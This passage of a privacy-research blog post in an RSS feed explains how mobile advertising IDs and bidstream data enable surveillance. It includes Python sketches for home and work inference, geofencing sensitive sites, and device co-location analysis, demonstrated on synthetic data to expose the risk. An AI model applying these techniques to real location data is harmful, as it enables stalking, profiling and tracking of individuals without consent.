<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[DFWORKS | Online Threat Mitigation]]></title><description><![CDATA[Preventing damages caused by cyberattackers, online disinformation distributors and propagandists.]]></description><link>https://dfworks.com</link><generator>GatsbyJS</generator><lastBuildDate>Wed, 26 Feb 2025 21:50:50 GMT</lastBuildDate><item><title><![CDATA[Winning Elections with MAID data]]></title><description><![CDATA[Introduction Having worked in intelligence, both in a government and private capacity, several recent articles have piqued my interest…]]></description><link>https://dfworks.com/blog/win_election_with_maid_data/</link><guid isPermaLink="false">https://dfworks.com/blog/win_election_with_maid_data/</guid><pubDate>Tue, 25 Feb 2025 12:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Having worked in intelligence in both government and private capacities, I have found several recent articles on Mobile Advertising IDs (MAIDs) and bidstream data particularly interesting. A recurring theme in the articles below (which are well worth reading) is that private intelligence agencies are widely leveraging bidstream data for what is essentially global surveillance.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://timsh.org/tracking-myself-down-through-in-app-ads/&quot;&gt;Tracking myself down through in-app ads&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://krebsonsecurity.com/2024/10/the-global-surveillance-free-for-all-in-mobile-ad-data&quot;&gt;The global surveillance free for all in mobile ad data&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.404media.co/hackers-claim-massive-breach-of-location-data-giant-threaten-to-leak-data/?ref=timsh.org&quot;&gt;Hackers claim massive breach of location data&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Bidstream data seems to be widely used by private intelligence agencies, but its use, unless I’m severely out of the loop, appears to be more prevalent in the US, where there are fewer regulatory hurdles. In contrast, UK privacy law, such as the UK GDPR, makes handling such datasets significantly riskier. The legal and ethical concerns surrounding bidstream data are well documented elsewhere, but I want to take a practical look at how the aggregation and analysis of this data amplifies risks, making it even more dangerous than some may realise.&lt;/p&gt;
&lt;p&gt;Mobile Advertising ID (MAID) data has typically been seen as a tool for targeted advertising, but its aggregation and analysis raise significant concerns. Large datasets enable the tracking of individuals, the inference of behaviours, and even the modelling of political affiliations. The modelling presented in this article is basic, probabilistic, and significantly reduced in complexity to demonstrate ‘the art of the possible’. The point is that, with access to more data and greater resources, intelligence agencies or major tech companies could develop far more sophisticated models capable of much more precise and nuanced outcomes.&lt;/p&gt;
&lt;h2&gt;Understanding MAID and Bidstream Data&lt;/h2&gt;
&lt;p&gt;Mobile Advertising IDs are persistent but resettable alphanumeric identifiers assigned to mobile devices. They were initially designed to enable advertisers to track user behaviour without relying on directly identifiable information such as phone numbers or email addresses. In theory, this allows for targeted advertising while maintaining user anonymity.&lt;/p&gt;
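&lt;p&gt;To make the identifier concrete: on iOS the MAID is Apple’s IDFA and on Android it is Google’s Advertising ID. Both are formatted as UUIDs, and a device that has limited ad tracking typically reports an all-zero value instead. The sketch below, which assumes MAIDs arrive as free-text strings, normalises them and discards zeroed or malformed values; the helper name &lt;code&gt;normalise_maid&lt;/code&gt; is hypothetical.&lt;/p&gt;

```python
import uuid
from typing import Optional

# The all-zero UUID is what a device typically reports when ad tracking is limited.
ZEROED_MAID = "00000000-0000-0000-0000-000000000000"


def normalise_maid(raw: str) -> Optional[str]:
    """Return a canonical lower-case MAID, or None if it is malformed or zeroed.

    Hypothetical helper: assumes MAIDs are UUID strings (IDFA or Google Advertising ID).
    """
    try:
        canonical = str(uuid.UUID(raw.strip()))
    except ValueError:
        return None  # not a UUID, so not a usable MAID
    if canonical == ZEROED_MAID:
        return None  # tracking limited: the ID carries no identity
    return canonical
```

&lt;p&gt;Note that a reset simply issues a new UUID, so one handset may appear under several MAIDs over time.&lt;/p&gt;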
&lt;p&gt;However, in practice, a thriving industry has emerged around the collection, enrichment, and resale of MAIDs. Marketing firms, data brokers, and advertisers routinely compile extensive lists of MAIDs, supplementing them with additional details, ranging from basic identifiers like names and emails to more invasive data such as social media profiles, precise GPS locations, and consumer behaviour insights. As a result, what was once an anonymous identifier has become a powerful tool for tracking individuals over time.&lt;/p&gt;
&lt;p&gt;Bidstream data originates from the real-time bidding (RTB) process, a system used in digital advertising where ad space is auctioned off in milliseconds before a webpage or app loads. For example, when you visit an article on The Sun, you might notice a grey space around the content that gets filled with an ad a second or two later. In that brief moment, information about your device is sent into an automated auction, where advertisers use complex algorithms to decide if you fit their target audience and, if so, place a bid to display their advert.&lt;/p&gt;
&lt;p&gt;This data exchange is largely invisible to users, yet it occurs every time an ad-supported app is used or a website with programmatic advertising is visited. Many common apps, including weather, fitness, and social networking apps, collect and transmit MAID data as part of this ecosystem. The issue is that this data is often shared openly, allowing not only advertisers but also virtually anyone involved in the ad-tech supply chain, such as data brokers and intelligence firms, to observe the auction and aggregate the data without actually placing any bids.&lt;/p&gt;
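&lt;p&gt;A passive observer needs only a handful of fields from each request. The sketch below uses a heavily trimmed bid request loosely modelled on the OpenRTB 2.x object model, in which &lt;code&gt;device.ifa&lt;/code&gt; carries the MAID and &lt;code&gt;device.geo&lt;/code&gt; the location. The request values are invented, real requests carry many more fields, and timestamping on arrival is an assumption. It shows how sightings can be logged per MAID without ever placing a bid.&lt;/p&gt;

```python
import json
from collections import defaultdict

# A trimmed, invented bid request loosely following the OpenRTB 2.x layout.
SAMPLE_REQUEST = json.dumps({
    "id": "req-001",
    "app": {"bundle": "com.example.weather"},
    "device": {
        "ifa": "6d92078a-8246-4ba4-ae5b-76104861e7dc",
        "os": "iOS",
        "geo": {"lat": 53.4106, "lon": -2.1575},
    },
})


def observe(raw_request: str, received_at: float, log: dict) -> None:
    """Record device, location and app from one request, without bidding on it."""
    req = json.loads(raw_request)
    device = req.get("device", {})
    geo = device.get("geo", {})
    maid = device.get("ifa")
    if maid is None or "lat" not in geo or "lon" not in geo:
        return  # nothing linkable in this request
    log[maid].append({
        "ts": received_at,  # timestamped on arrival (assumption; exchanges vary)
        "lat": geo["lat"],
        "lon": geo["lon"],
        "app": req.get("app", {}).get("bundle"),
    })


sightings = defaultdict(list)
observe(SAMPLE_REQUEST, 1_700_000_000.0, sightings)
```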
&lt;h2&gt;The Fallacy of Privacy Settings in Mobile Advertising&lt;/h2&gt;
&lt;p&gt;While MAIDs and bidstream data are technically anonymised, their sheer richness makes de-anonymisation trivial. Movement patterns, repeated locations, and app usage can quickly reveal the identity of a person, even without a name attached. Investigations into bidstream datasets have demonstrated that it is possible to establish precise movement profiles of individuals, highlighting where they live, work, and spend their leisure time.&lt;/p&gt;
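&lt;p&gt;To illustrate how little is needed, the sketch below takes a device’s most frequent night-time location as its likely home and its most frequent weekday daytime location as its likely workplace. The hour windows, the grid (rounding coordinates to three decimal places, cells of roughly 100 m or less) and the &lt;code&gt;(timestamp, lat, lon)&lt;/code&gt; input shape are all assumptions chosen for illustration.&lt;/p&gt;

```python
from collections import Counter
from datetime import datetime
from typing import Callable, Iterable, Optional, Tuple

Ping = Tuple[datetime, float, float]  # (timestamp, lat, lon)
Cell = Tuple[float, float]


def to_cell(lat: float, lon: float) -> Cell:
    # Rounding to 3 decimal places snaps pings to a grid of roughly 100 m.
    return (round(lat, 3), round(lon, 3))


def most_common_cell(pings: Iterable[Ping], keep: Callable[[datetime], bool]) -> Optional[Cell]:
    counts = Counter(to_cell(lat, lon) for ts, lat, lon in pings if keep(ts))
    return counts.most_common(1)[0][0] if counts else None


def is_night(ts: datetime) -> bool:
    # Assumed window: 22:00 to 06:00.
    return ts.hour >= 22 or 6 > ts.hour


def is_work_hours(ts: datetime) -> bool:
    # Assumed window: Monday to Friday, 09:00 to 17:00.
    return 5 > ts.weekday() and ts.hour >= 9 and 17 > ts.hour


def infer_home_and_work(pings: list) -> dict:
    return {
        "home": most_common_cell(pings, is_night),
        "work": most_common_cell(pings, is_work_hours),
    }
```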
&lt;p&gt;The potential for abuse is significant. Intelligence agencies, corporate entities, and even malicious actors can leverage bidstream data to monitor individuals, track dissidents, or infer political affiliations. Even when users opt out of tracking, there are often alternative device identifiers (such as Apple’s IDFV, device IDs, or app-specific identifiers) that can be exploited for cross-app tracking, further eroding the illusion of privacy controls.&lt;/p&gt;
&lt;p&gt;Beyond traditional ad-tracking mechanisms, many apps transmit unexpected data points such as screen brightness, battery levels, and motion sensor data. These seemingly minor signals, when analysed in context alongside OSINT methods, can provide valuable insights into user behaviour.&lt;/p&gt;
&lt;p&gt;Researcher Tim (timsh.org) has suggested that Uber may use battery level data to influence ride pricing. The theory is that users with lower battery levels are more likely to accept surge pricing, as they may fear their phone dying before they can request another ride. While Uber has denied this practice, it highlights how seemingly inconsequential data points can be monetised.&lt;/p&gt;
&lt;h2&gt;Warrantless Surveillance and the Use of Bidstream Data in Investigations&lt;/h2&gt;
&lt;p&gt;Babel Street and its subsidiary, Atlas, have leveraged MAID data to conduct location-based tracking of individuals near sensitive locations, including mosques, courtrooms, and abortion clinics. This data, typically sourced from mobile applications, allows for near real-time geolocation monitoring without the need for direct user consent or judicial authorisation.&lt;/p&gt;
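&lt;p&gt;Location-based tracking of this kind is, at its core, a geofence query: find every device with a ping within some radius of a sensitive site. A minimal sketch follows, using the haversine great-circle distance on a spherical Earth; the site coordinates, radius and &lt;code&gt;(maid, lat, lon)&lt;/code&gt; ping format are invented for illustration.&lt;/p&gt;

```python
import math
from typing import Iterable, Set, Tuple

EARTH_RADIUS_M = 6_371_000  # mean Earth radius in metres


def haversine_m(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance in metres (spherical approximation)."""
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def devices_in_geofence(
    pings: Iterable[Tuple[str, float, float]],  # (maid, lat, lon)
    site: Tuple[float, float],
    radius_m: float,
) -> Set[str]:
    """Return the MAIDs seen within radius_m metres of the site."""
    return {
        maid
        for maid, lat, lon in pings
        if radius_m >= haversine_m(lat, lon, site[0], site[1])
    }
```

&lt;p&gt;Adding a time filter to the same query (pings before and after a given event) is all it takes to reconstruct movements around that site.&lt;/p&gt;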
&lt;p&gt;A particularly concerning instance of this practice involved investigators using MAID data to track jurors in a New Jersey courtroom. By analysing the location signals from mobile devices, investigators were able to determine not only the presence of jurors at the courthouse but also their movements before and after trial proceedings. This level of surveillance raises significant ethical and legal concerns, as it could be used to exert undue influence, monitor private behaviour, or compromise the integrity of judicial processes.&lt;/p&gt;
&lt;p&gt;The primary legal concern surrounding the use of MAID data in this manner is the lack of regulatory oversight. Unlike traditional surveillance techniques, which require warrants or legal justification, MAID-based tracking is often conducted without scrutiny. Anyone can purchase such data from third-party vendors for around £10,000.&lt;/p&gt;
&lt;p&gt;The tracking of individuals near religious sites, medical facilities, and legal institutions raises civil liberties concerns, particularly regarding privacy rights and potential discrimination. The ability to monitor individuals based on their location near a mosque, for instance, could enable religious profiling, while tracking individuals near abortion clinics in US states where abortion has been outlawed could be used to intimidate or target those seeking medical care.&lt;/p&gt;
&lt;p&gt;Without clear regulatory safeguards, the commercial availability of MAID data enables extensive surveillance capabilities with minimal accountability. Experts with more knowledge of this subject matter than I have called urgently for legislative intervention to establish stricter controls on how location data is collected, sold, and used by both private entities and government agencies.&lt;/p&gt;
&lt;h2&gt;Synthetic Data Generation&lt;/h2&gt;
&lt;p&gt;Accessing authentic MAID data in the UK is prohibitively expensive and fraught with legal complications, effectively rendering it off-limits for research or experimentation. Therefore, I created a synthetic dataset designed to mimic real-world patterns. Although this synthetic data is almost certainly markedly different from actual MAID/bidstream data, it still incorporates similar fields and exhibits enough variability and randomness to facilitate basic modelling and illustrate privacy concerns.&lt;/p&gt;
&lt;p&gt;For those interested in the underlying methodology, the code used to build this dataset is available &lt;a href=&quot;https://github.com/dfaram7/synthetic_bidstream/blob/main/snippet&quot;&gt;here&lt;/a&gt;. Developed using actual locations in Stockport, UK, it facilitates the random (with constraints) simulation of user movements and interactions within a realistic urban setting. &lt;/p&gt;
&lt;p&gt;To simulate realistic usage, fictional device personas are assigned based on common lifestyle behaviours. These personas dictate movement patterns and interactions with locations; for example, a user may be:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Foodie&lt;/strong&gt; - Frequently visits restaurants, cafés, and food markets.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Pub-goer&lt;/strong&gt; - Spends evenings at bars and pubs, often making late-night movements.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Commuter&lt;/strong&gt; - Follows a structured daily route between home and work locations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Shopper&lt;/strong&gt; - Regularly visits retail areas and shopping centres.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Smoker&lt;/strong&gt; - Pauses at convenience stores and designated smoking areas.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each persona follows a probabilistic movement model, meaning that their routines include both predictable behaviours (e.g., a commuter heading to work at 8 AM) and spontaneous deviations (e.g., stopping at a café). By incorporating stochastic elements, the dataset better reflects real-world unpredictability.&lt;/p&gt;
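&lt;p&gt;The probabilistic element can be sketched as a weighted random choice of the next place category, with weights that depend on the persona and the hour of day. The persona names mirror the list above, but the categories, weights and hour bands here are hypothetical and are not taken from the linked repository.&lt;/p&gt;

```python
import random
from typing import Dict

# Hypothetical relative weights for each place category, per persona.
PERSONA_WEIGHTS: Dict[str, Dict[str, float]] = {
    "foodie": {"home": 3, "work": 4, "restaurant": 5, "cafe": 4, "pub": 1, "shop": 1},
    "pub-goer": {"home": 3, "work": 4, "restaurant": 1, "cafe": 1, "pub": 5, "shop": 1},
    "commuter": {"home": 4, "work": 8, "restaurant": 1, "cafe": 1, "pub": 1, "shop": 1},
    "shopper": {"home": 3, "work": 4, "restaurant": 1, "cafe": 2, "pub": 1, "shop": 6},
    "smoker": {"home": 3, "work": 4, "restaurant": 1, "cafe": 1, "pub": 1, "shop": 1, "convenience": 4},
}


def next_category(persona: str, hour: int, rng: random.Random) -> str:
    """Pick the next place category: a routine bias plus random deviation."""
    if hour >= 23 or 6 > hour:
        return "home"  # assumed: devices stay at home overnight
    weights = dict(PERSONA_WEIGHTS[persona])
    if hour >= 9 and 17 > hour:
        weights["work"] *= 3  # routine: working hours strongly favour the workplace
    else:
        weights["work"] = 0  # assumed: no trips to work outside these hours
    categories = list(weights)
    return rng.choices(categories, weights=[weights[c] for c in categories], k=1)[0]
```

&lt;p&gt;Passing a seeded &lt;code&gt;random.Random&lt;/code&gt; keeps runs reproducible while still producing the occasional detour.&lt;/p&gt;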
&lt;p&gt;The dataset is generated through a multi-step simulation process:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Geo-Spatial Mapping&lt;/strong&gt; - A map of Stockport is enriched with open-source business and land-use data from OpenStreetMap, queried via &lt;a href=&quot;https://overpass-turbo.eu/&quot;&gt;overpass turbo&lt;/a&gt;, including points of interest (e.g., restaurants, cafes, businesses).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Device Seeding&lt;/strong&gt; - Synthetic devices are distributed across residential areas, with each assigned a job, favourite locations and a persona.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Movement Simulation&lt;/strong&gt; - Devices interact with amenities, workplaces, and transit routes, following realistic daily schedules. Variations are introduced to account for weekends, holidays, and unexpected detours.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Bidstream Data Emulation&lt;/strong&gt; - The synthetic devices generate timestamped location pings from fictional applications (social media, weather app, dating app), replicating the kind of data observed in real MAID datasets. This includes signal frequency variations, dwell times, and movement speed to prevent artificial uniformity.&lt;/li&gt;
&lt;/ol&gt;
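&lt;p&gt;Step 4 can be sketched as follows: while a device dwells at a place, its apps emit pings at irregular intervals with a little positional noise. The app names follow the fictional apps above, but the mean interval, exponential gaps and jitter size are hypothetical choices, not values from the linked code.&lt;/p&gt;

```python
import random
from datetime import datetime, timedelta
from typing import List, Tuple

APPS = ["social_media", "weather", "dating"]  # fictional apps


def emulate_pings(
    device_id: str,
    lat: float,
    lon: float,
    start: datetime,
    dwell: timedelta,
    rng: random.Random,
    mean_gap_s: float = 600.0,
    jitter_deg: float = 0.0002,
) -> List[Tuple[str, datetime, float, float, str]]:
    """Emit (device_id, timestamp, lat, lon, app) rows for one dwell period."""
    rows = []
    t = start + timedelta(seconds=rng.expovariate(1 / mean_gap_s))
    end = start + dwell
    while end > t:
        rows.append((
            device_id,
            t,
            lat + rng.gauss(0, jitter_deg),  # GPS-style noise, roughly 10 to 20 m
            lon + rng.gauss(0, jitter_deg),
            rng.choice(APPS),
        ))
        # Exponential gaps make ping timing irregular rather than clockwork.
        t += timedelta(seconds=rng.expovariate(1 / mean_gap_s))
    return rows
```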
&lt;p&gt;By leveraging realistic user segmentation and geospatial modelling, this synthetic dataset enables experimentation with bidstream mechanics, ad targeting simulations, and behavioural analysis, all while avoiding the legal and ethical concerns tied to real-world MAID data usage.&lt;/p&gt;
&lt;h2&gt;Demonstrating the Predictive Power of Bidstream Data&lt;/h2&gt;
&lt;p&gt;Before diving into modelling, we can first explore some basic patterns within the dataset. These images show how location data clusters, how individual movement patterns emerge, and how co-location analysis can hint at relationships between devices.&lt;/p&gt;
&lt;p&gt;The first visualisation is a map displaying all data points in the dataset, revealing key clusters around residential areas, workplaces, and common travel routes. Since this dataset is based on real locations in Stockport, UK, we would expect to see concentrations near transport links, shopping areas, and hospitality venues, and this is what our fictional data shows.&lt;/p&gt;
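&lt;p&gt;Clusters like these can be surfaced without any mapping software by binning pings into grid cells and ranking the busiest cells. This is a deliberately crude stand-in for proper density-based clustering (DBSCAN, for instance), and the cell size set by &lt;code&gt;decimals&lt;/code&gt; is an assumption.&lt;/p&gt;

```python
from collections import Counter
from typing import Iterable, List, Tuple


def hotspots(
    points: Iterable[Tuple[float, float]],  # (lat, lon)
    decimals: int = 3,
    top_n: int = 5,
) -> List[Tuple[Tuple[float, float], int]]:
    """Return the top_n busiest grid cells with their ping counts."""
    # Rounding coordinates assigns each ping to a coarse grid cell.
    counts = Counter((round(lat, decimals), round(lon, decimals)) for lat, lon in points)
    return counts.most_common(top_n)
```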
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/aedfd078c2b0ebeec4b0d1002dcfc7de/e5715/stockportone.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 71.62162162162163%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAIAAACgpqunAAAACXBIWXMAABJ0AAASdAHeZh94AAADI0lEQVQozy3SzW/adhgH8EhTpf4JO03asacepx0mddouu06d1MOmXaYepqmHSas6rcqlh2raVHXaFi1tOhLSqYQ2JAvvIakBg41fMMaAfz8bvwEOYGxCCC92DIRBtO/hOT0f6ZG+z8p8Pr+8vBwOhxPXnSwym/UHQ8O0zO6paZrdxRycW87IsDrmqXU5nU7c2dWeu1ArSzybibJUyWdFCfBlQkTjPJHlc2lazbIMrqw/1zxPKQmnWaTRLFc1TqjSosbYF8MlHo1GUAGQwHhIsYAiHz0jvSH8ZdjHiARKD+580b79uezf4plM1SrLPQwaScHCRk5/iR3XhTwHOYYFXC6GRPcpsOmRPWvU41/Ye4/aG0+U4I7095+FCiIBtqqhAIRKtdTAPl/i4dgWqIyERmpIGEQT9F9+495d++OP2h/eynsCzbZe75kGgtaPIjD+RmKOIBUSiMPxzFli17aFKsul9pQXa8C3K9z5zrnx/uT6O9qXX2FxnlPtkjwSJbsYJf+F/B6Rj8SQ9FGu3x+vOI5zftZXSErd3db9XvHJU/j7q+7aev/BQ+OP57HVYHFjJ4NlS+mk/2dEuvtt+5Nbrc8+zRwc6u3JSn+R8wFPYDn/Frf/uhyPC4Rerc+J4kwz5qiXA5uvxTSqbntDvwb4+99Pr12bvvcu5fed9OZXZ7uuDDmJOoZySYmEmWc+4hgvJPNEukR4gzCaKrX6fOItSjMFq9L94Rvng5tIONIwnP+rqpUpqGS1HKK+eQWpAC/jSipchCSdDtbWfqsj8QYeLMMS3yGhmeze/zoT8NXN6VVVk4lQJIHfI71Yl376kWOyEIup0V0RiXKJw8LWFlxdxaM+hMVBAzRI5ARgRZLUjYsltsdjKIuVvR0mvA8CO+XEAUwdyGhCELF6MtiK7Ovbm7V/NrhQmM1PCHYOtbmqn+nNwRKPRyOhCit0VMgcCHiqCgoV5lgkM0K3IDSoFnakH0c6cpGmxbe4yHhj8OVhjobN1tV7LtpSZFlv6RIEJ+2WqtWsZl2ty52zhqoAq3Wi907NXqfZMmlWLeaFfJZXFeviwv0PbbejMBizgxgAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Stockport MAID Data&quot;
        title=&quot;Stockport MAID Data&quot;
        src=&quot;/static/aedfd078c2b0ebeec4b0d1002dcfc7de/fcda8/stockportone.png&quot;
        srcset=&quot;/static/aedfd078c2b0ebeec4b0d1002dcfc7de/12f09/stockportone.png 148w,
/static/aedfd078c2b0ebeec4b0d1002dcfc7de/e4a3f/stockportone.png 295w,
/static/aedfd078c2b0ebeec4b0d1002dcfc7de/fcda8/stockportone.png 590w,
/static/aedfd078c2b0ebeec4b0d1002dcfc7de/e5715/stockportone.png 768w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Next, we examine the movement patterns of a single device over time. This visualisation highlights:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Primary locations&lt;/strong&gt; such as home, workplace, and frequent leisure spots.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Preferred routes&lt;/strong&gt; for commuting, errands, or social activities.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Temporal habits&lt;/strong&gt;, indicating when this individual is most likely to be in specific areas.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This type of pattern-of-life analysis is valuable for understanding user routines, potential deviations, and broader behavioural trends that could be leveraged for targeted advertising, surveillance, or predictive modelling.&lt;/p&gt;
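&lt;p&gt;The temporal-habits element is essentially a histogram: for each place a device frequents, count its pings by hour of day. A minimal sketch, assuming pings have already been snapped to named places (the place labels are hypothetical):&lt;/p&gt;

```python
from collections import Counter, defaultdict
from datetime import datetime
from typing import Dict, Iterable, Tuple


def hourly_profile(visits: Iterable[Tuple[datetime, str]]) -> Dict[str, Counter]:
    """Map each place to a Counter of hour-of-day -> ping count."""
    profile: Dict[str, Counter] = defaultdict(Counter)
    for ts, place in visits:
        profile[place][ts.hour] += 1
    return dict(profile)


def usual_hour(profile: Dict[str, Counter], place: str) -> int:
    """The hour at which the device is most often seen at a place."""
    return profile[place].most_common(1)[0][0]
```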
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/e02fef00ff06b8e8201e3196f72415ee/e1031/device47.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 83.78378378378379%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAIAAABSJhvpAAAACXBIWXMAABJ0AAASdAHeZh94AAADMUlEQVQ4yzXTaXeiOhgA4Pn/f+Ru0047erVuqGDYIaxJWAS1goIVBLG2naqDc2zOSb49ec+7fbtcLsfjMd+sjlVxOBzKqkzXm2SdPsfLeB1d31W8WMwW89nxtTpUh7Ioil3x8eujht/Ol0uWbT3Qc1UGITD0qAEZjMIJimTV7/OmbOiAASPA09BmLVdGWFcdOiterri+729vgsCpUteTW5Ir9lMKzMfFzkkzIwwJtjTkDUBAD0l3jAccHo5nnc3rF96Xuc49WeYEoQHRxg5WwVQyliyJhefE8OdiGFBuLAvxPR02WrjxyDTibfIHny/5Pp/L7blCSSG0HDM0uABJ9lztkUcajZONOQ1ZEEHgd1QiDhVKEPk0SW+Rj2/vpsao1D2tdz0PElc04IBARtLahvUUPMvBtBOGEjYUXeEIllzM5bvkhrMsa4uUKvZ9dUIC20a6pkLbNshMIhbr1T9y/7j+o7L4LsGuzA00ub0tNlf8+fmZ7fIJO5K4ES+BwFIcC3oO9nycpgQRx7F5P2mB5QMft7UZVFVNEKTNNrvifVmWx4OERUNkJiLPcbTL0XNbmK3MOLLnMfbDrrH56W4ZuBjC9cBNgeWZWba74tPp9JLnE6E5gV0BK03tnoajUAKepdih4xF96nbXWzXdWm46Yhd34nOLN9g601vOh/3O1TgN27zJKbagmirgWZsZ2NYYm8ByBDPtoYQy456c/GT95khpbrLVDX+87U29h7BqIIE4HrIwLbGjyXjc+rff/8HYHS5+VKP/peQBbhp6RAmL5kuxvI3nbpsacptDT9jtu87ImGqE2DjwdZnX6R7k/5Lc/+RFhwkeFNITMCXHD/lhfYtcVXt2Qg91GqYyCsb+FCwDw7dBCJ6QyGt0E7HfXXRn4ztNpzmoMlYzyaOv2X4/ImwQ30MxxwWtRex4AXS1RiR0YwMksedPsWS2Rfdvnm/BYR9Oui/pn5zP53NdOllRdCSSiAWkUTdp5VtTIiwTL8sTd2HE6TSKwqZwN572kKUYqlhuvxaj9vvrKeu27ctqX1Xn06mqqiiK4niV5/nr8bWepXJX1vv3/usjL4rP06mGvwEtSWT8PDUdBQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Device 47&quot;
        title=&quot;Device 47&quot;
        src=&quot;/static/e02fef00ff06b8e8201e3196f72415ee/fcda8/device47.png&quot;
        srcset=&quot;/static/e02fef00ff06b8e8201e3196f72415ee/12f09/device47.png 148w,
/static/e02fef00ff06b8e8201e3196f72415ee/e4a3f/device47.png 295w,
/static/e02fef00ff06b8e8201e3196f72415ee/fcda8/device47.png 590w,
/static/e02fef00ff06b8e8201e3196f72415ee/e1031/device47.png 803w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;By identifying instances where two or more devices consistently appear in the same locations at similar times, we can infer potential relationships. If this co-location occurs in a residential setting, it may suggest cohabitation, such as roommates or family members. If the overlap happens at public amenities, it could indicate social connections, such as friendships or dating relationships.&lt;/p&gt;
&lt;p&gt;By mapping these overlapping location patterns, we can infer:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Shared residences&lt;/strong&gt; (devices returning to the same address each night).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Regular joint activities&lt;/strong&gt; (frequenting the same venues or travelling together).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Possible workplace connections&lt;/strong&gt; (devices present at the same office or worksite).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;While this is a simple demonstration, at scale, such methods could be used for network analysis, law enforcement investigations, or commercial audience segmentation.&lt;/p&gt;
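&lt;p&gt;A simple way to quantify co-location is to bucket each ping into a space-time cell (a grid cell plus a time window) and count how many cells each pair of devices shares. The three-decimal grid and 15-minute window below are assumptions; a fuller analysis might also weight overlaps by location type, for example night-time residential cells.&lt;/p&gt;

```python
from collections import defaultdict
from datetime import datetime
from itertools import combinations
from typing import Dict, Iterable, Tuple


def colocation_counts(
    pings: Iterable[Tuple[str, datetime, float, float]],  # (device_id, ts, lat, lon)
    window_min: int = 15,
) -> Dict[Tuple[str, str], int]:
    """Count shared space-time cells for every pair of devices."""
    cells = defaultdict(set)  # (lat_cell, lon_cell, time_bucket) -> device ids
    for device, ts, lat, lon in pings:
        bucket = int(ts.timestamp() // (window_min * 60))
        cells[(round(lat, 3), round(lon, 3), bucket)].add(device)

    pairs: Dict[Tuple[str, str], int] = defaultdict(int)
    for devices in cells.values():
        # Sorting gives each pair a stable key regardless of set order.
        for a, b in combinations(sorted(devices), 2):
            pairs[(a, b)] += 1
    return dict(pairs)
```

&lt;p&gt;Hard cell and window boundaries can split pings that are genuinely close, so repeated overlaps across many days matter more than any single match.&lt;/p&gt;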
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
